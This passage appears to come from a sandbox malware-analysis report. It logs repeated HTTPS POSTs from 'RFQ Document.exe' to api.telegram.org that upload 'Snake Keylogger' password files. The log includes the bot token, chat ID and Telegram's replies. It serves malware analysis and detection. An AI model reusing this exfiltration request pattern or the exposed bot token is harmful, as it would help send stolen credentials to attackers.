2021-09-28 05:58:09 UTC	1	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:09 UTC	2	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 36 38 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12578,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808689,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49784	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:22 UTC	15	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c309ad23 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:22 UTC	16	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 30 39 61 64 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c309ad23Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:22 UTC	16	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:22 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:22 UTC	16	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12589,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808702,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.2.4	49876	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:42 UTC	160	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ceee4404 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:42 UTC	160	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 65 65 34 34 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ceee4404Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:42 UTC	160	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:42 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:42 UTC	161	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12683,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808722,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.2.4	49877	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:42 UTC	161	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cf146a4e Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:42 UTC	162	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 31 34 36 61 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cf146a4eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:42 UTC	162	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:42 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:42 UTC	162	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12684,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808722,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.2.4	49878	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:43 UTC	163	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cf29df91 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:43 UTC	163	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 32 39 64 66 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cf29df91Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:43 UTC	164	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:43 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:43 UTC	164	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12685,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808723,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.2.4	49879	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:43 UTC	164	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cf48dd2b Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:43 UTC	165	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 34 38 64 64 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cf48dd2bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:43 UTC	165	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:43 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:43 UTC	166	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12686,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808723,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.2.4	49880	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:43 UTC	166	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cf67dbc5 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:43 UTC	166	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 36 37 64 62 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cf67dbc5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:43 UTC	167	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:43 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:43 UTC	167	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12687,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808723,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.2.4	49881	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:43 UTC	168	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cf9c5368 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:43 UTC	168	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 39 63 35 33 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cf9c5368Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:43 UTC	168	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:43 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:43 UTC	169	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 33 2c 22 64 Data Ascii: 